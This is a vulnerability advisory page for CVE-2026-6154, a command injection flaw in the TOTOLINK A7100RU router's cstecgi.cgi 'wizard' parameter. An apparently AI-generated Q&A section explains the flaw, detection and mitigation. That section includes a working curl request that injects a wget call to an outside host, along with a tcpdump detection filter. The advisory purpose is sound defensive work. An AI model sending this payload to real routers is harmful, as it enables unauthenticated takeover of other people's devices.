CVE-2026-6154
OS Command Injection in Totolink A7100RU CGI Handler (Remote
Publication date: 2026-04-13
Last updated on: 2026-04-13
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| totolink | a7100ru | 7.4cu.2313_b20191024 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify how the CVE-2026-6154 vulnerability impacts compliance with common standards and regulations such as GDPR or HIPAA.
Can you explain this vulnerability to me?
The CVE-2026-6154 vulnerability affects the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It is a command injection flaw located in the cstecgi.cgi component, specifically in the function that processes the "wizard" parameter.
The vulnerability arises because the "wizard" parameter is inserted into a buffer without proper sanitization and then executed as an operating system command. This allows an attacker to remotely execute arbitrary OS commands on the router by sending a crafted HTTP POST request containing malicious input in the "wizard" parameter.
For example, an attacker can inject commands like `wget 192.168.6.1:7777/testpoc` which the router will execute, demonstrating the ability to run arbitrary commands remotely.
How can this vulnerability impact me? :
This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router without any authentication.
- Attackers can take full control of the router, potentially altering its configuration or behavior.
- It can be used to install malware, create backdoors, or pivot to other devices on the network.
- The router could be used as part of a botnet or for launching further attacks.
- Network security and privacy could be severely compromised.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring for suspicious HTTP POST requests sent to the endpoint /cgi-bin/cstecgi.cgi containing a JSON payload with the "wizard" parameter. Specifically, look for requests where the "wizard" parameter includes unusual or potentially malicious commands, such as wget or other OS command invocations.
A practical detection method is to capture and analyze network traffic targeting the router, searching for POST requests to /cgi-bin/cstecgi.cgi with suspicious payloads.
Example command to capture such traffic using tcpdump on a monitoring system:
- tcpdump -A -s 0 'tcp port 80 and (((ip dst <router_ip>) and (tcp[((tcp[12] & 0xf0) >> 2):4] = 0x504f5354))' | grep -i 'wizard'
Alternatively, you can use curl to test if the router is vulnerable by sending a crafted POST request with a command injection payload in the "wizard" parameter, for example:
- curl -X POST http://<router_ip>/cgi-bin/cstecgi.cgi -d '{"wizard":"; wget http://192.168.6.1:7777/testpoc;"}' -H 'Content-Type: application/json'
If the router executes the injected command (e.g., attempts to download a file from the specified IP), it confirms the presence of the vulnerability.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include restricting access to the vulnerable router's management interface to trusted networks only, such as limiting access via firewall rules or network segmentation.
Disable remote management features if they are enabled, especially access to the /cgi-bin/cstecgi.cgi endpoint.
Monitor network traffic for suspicious POST requests targeting the vulnerable endpoint and block any malicious activity.
If available, apply any official firmware updates or patches provided by the vendor that address this vulnerability.
As a temporary workaround, consider implementing web application firewall (WAF) rules or intrusion prevention system (IPS) signatures to detect and block exploitation attempts targeting the "wizard" parameter.